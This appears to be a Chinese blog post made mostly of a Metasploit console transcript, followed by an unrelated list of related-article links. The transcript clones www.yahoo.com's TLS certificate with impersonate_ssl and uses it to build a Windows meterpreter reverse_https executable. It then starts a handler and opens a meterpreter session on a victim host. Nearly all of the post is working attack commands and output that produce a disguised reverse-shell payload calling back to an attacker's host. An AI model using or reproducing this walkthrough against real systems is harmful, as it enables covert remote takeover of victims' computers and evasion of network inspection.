Metasploit - reverse_https
2015-11-17 10:39
856 查看
msf auxiliary(impersonate_ssl) > show options Module options (auxiliary/gather/impersonate_ssl): Name Current Setting Required Description ---- --------------- -------- ----------- ADD_CN no Add CN to match spoofed site name (e.g. *.example.com) CA_CERT no CA Public certificate EXPIRATION no Date the new cert should expire (e.g. 06 May 2012, YESTERDAY or NOW) OUT_FORMAT PEM yes Output format (Accepted: DER, PEM) PRIVKEY no Sign the cert with your own CA private key PRIVKEY_PASSWORD no Password for private key specified in PRIV_KEY (if applicable) RHOST yes The target address RPORT 443 yes The target port msf auxiliary(impersonate_ssl) > set RHOST www.yahoo.com RHOST => www.yahoo.com msf auxiliary(impersonate_ssl) > run [*] Connecting to www.yahoo.com:443 [*] Copying certificate from www.yahoo.com:443 /C=US/ST=California/L=Sunnyvale/O=Yahoo Inc./OU=Information Technology/CN=www.yahoo.com [*] Beginning export of certificate files [*] Creating looted key/crt/pem files for www.yahoo.com:443 [+] key: /home/notfound/.msf4/loot/20151117022203_default_116.214.12.74_www.yahoo.com_ke_612544.key [+] crt: /home/notfound/.msf4/loot/20151117022204_default_116.214.12.74_www.yahoo.com_ce_987985.crt [+] pem: /home/notfound/.msf4/loot/20151117022204_default_116.214.12.74_www.yahoo.com_pe_902367.pem [*] Auxiliary module execution completed
msf auxiliary(impersonate_ssl) > use payload/windows/meterpreter/reverse_https msf payload(reverse_https) > set STAGERVERIFYSSLCERT true STAGERVERIFYSSLCERT => true msf payload(reverse_https) > set HANDLERSSLCERT /home/notfound/.msf4/loot/20151117022204_default_116.214.12.74_www.yahoo.com_pe_902367.pem HANDLERSSLCERT => /home/notfound/.msf4/loot/20151117022204_default_116.214.12.74_www.yahoo.com_pe_902367.pem msf payload(reverse_https) > set LHOST 192.168.1.103 LHOST => 192.168.1.103 msf payload(reverse_https) > set LPORT 8443 LPORT => 8443 msf payload(reverse_https) > generate -t exe -f /tmp/https.exe -p x86 [*] Writing 73802 bytes to /tmp/https.exe...
msf payload(reverse_https) > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_https payload => windows/meterpreter/reverse_https msf exploit(handler) > set HANDLERSSLCERT /home/notfound/.msf4/loot/20151117022204_default_116.214.12.74_www.yahoo.com_pe_902367.pem HANDLERSSLCERT => /home/notfound/.msf4/loot/20151117022204_default_116.214.12.74_www.yahoo.com_pe_902367.pem msf exploit(handler) > set STAGERVERIFYSSLCERT true STAGERVERIFYSSLCERT => true msf exploit(handler) > set LPORT 8443 LPORT => 8443 msf exploit(handler) > set LHOST 192.168.1.103 LHOST => 192.168.1.103 msf exploit(handler) > run -j [*] Exploit running as background job. [*] Started HTTPS reverse handler on https://0.0.0.0:8443/ msf exploit(handler) > [*] Starting the payload handler... msf exploit(handler) > [*] 192.168.1.106:1432 (UUID: 0d7dc065ab206136/x86=1/windows=1/2015-11-17T02:28:16Z) Staging Native payload ... [*] Meterpreter will verify SSL Certificate with SHA1 hash 9ce474cb2ec1122d77e05dc20f89a9c03266dd81 [*] Meterpreter session 1 opened (192.168.1.103:8443 -> 192.168.1.106:1432) at 2015-11-17 02:28:20 +0000 msf exploit(handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter >
References
http://www.darkoperator.com/blog/2015/6/14/tip-meterpreter-ssl-certificate-validation相关文章推荐
- HTTPS请求与HTTP兼容
- HTTP实例详解
- Socket 通信原理(Android客户端和服务器以TCP&&UDP方式互通)
- NSURLSession简介
- HttpURLConnection获取JSON处理
- 计算机网络——因特网
- 『RNN 监督序列标注』笔记-第四章 LSTM(Long Short-Term Memory)
- Http网络请求
- 对于线程池和AsyncTask的理解
- Android初识-模拟器网络IP设置
- 【读书笔记】iOS网络-使用Game Kit实现设备间通信
- 【读书笔记】iOS网络-使用Game Kit实现设备间通信
- 采用AsyncTask异步加载网络图片
- win7 windows server 2008R2下 https SSL证书安装的搭配(搭配https ssl本地测试环境) (转)
- 黑马程序员——网络编程(二)
- ios9.0之后不能使用Http协议解决办法
- 【人人都要学算法】网络流算法远比你想的要好玩
- [置顶] 网络爬虫:利用Selenium实现登录
- 解决百度地图找不到SDKInitializer,无法解析的问题
- apach+https安装过程出现的问题